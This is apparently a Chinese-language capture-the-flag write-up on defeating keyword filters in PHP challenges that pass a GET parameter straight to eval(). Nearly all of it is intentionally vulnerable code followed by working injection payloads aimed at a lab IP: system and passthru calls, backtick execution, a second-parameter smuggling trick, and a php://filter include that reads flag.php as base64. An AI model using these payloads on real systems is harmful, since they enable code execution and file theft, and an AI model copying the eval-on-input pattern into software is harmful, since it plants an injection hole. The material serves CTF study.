目录
[过滤了很多但是主要的就是过滤了空格 和' 注意一下这个就行](#过滤了很多但是主要的就是过滤了空格 和' 注意一下这个就行)
被过滤了flag怎么办
php
<?php
error_reporting(0);
if(isset($_GET['c'])){
$c = $_GET['c'];
if(!preg_match("/flag/i", $c)){
eval($c);
}
}else{
highlight_file(__FILE__);
}
方法
php
?c=system('cat fla*');
结果
过滤了flag、php、system
php
<?php
error_reporting(0);
if(isset($_GET['c'])){
$c = $_GET['c'];
if(!preg_match("/flag|system|php/i", $c)){
eval($c);
}
}else{
highlight_file(__FILE__);
}
方法一
php
?c=echo%20`cat%20fla*`;
结果
方法二
php
?c=passthru('cat fla*');
过滤了很多但是主要的就是过滤了空格 和' 注意一下这个就行
php
<?php
error_reporting(0);
if(isset($_GET['c'])){
$c = $_GET['c'];
if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(|\:|\"|\<|\=|\/|[0-9]/i", $c)){
eval($c);
}
}else{
highlight_file(__FILE__);
}
方法一
php
http://192.168.244.152:8080/web.php?c=passthru($_GET[A]);&A=cat%20flag.php
方法二
php
http://192.168.244.152:8080/web.php?c=include$_GET[A]?%3E&A=php://filter/read=convert.base64-encode/resource=flag.php
相对于上面一道题来说多过滤了一个括号
php
<?php
error_reporting(0);
if(isset($_GET['c'])){
$c = $_GET['c'];
if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(|\:|\"|\<|\=|\/|[0-9]/i", $c)){
eval($c);
}
}else{
highlight_file(__FILE__);
}
方法一
php
http://192.168.244.152:8080/web.php?c=include$_GET[A]?%3E&A=php://filter/read=convert.base64-encode/resource=flag.php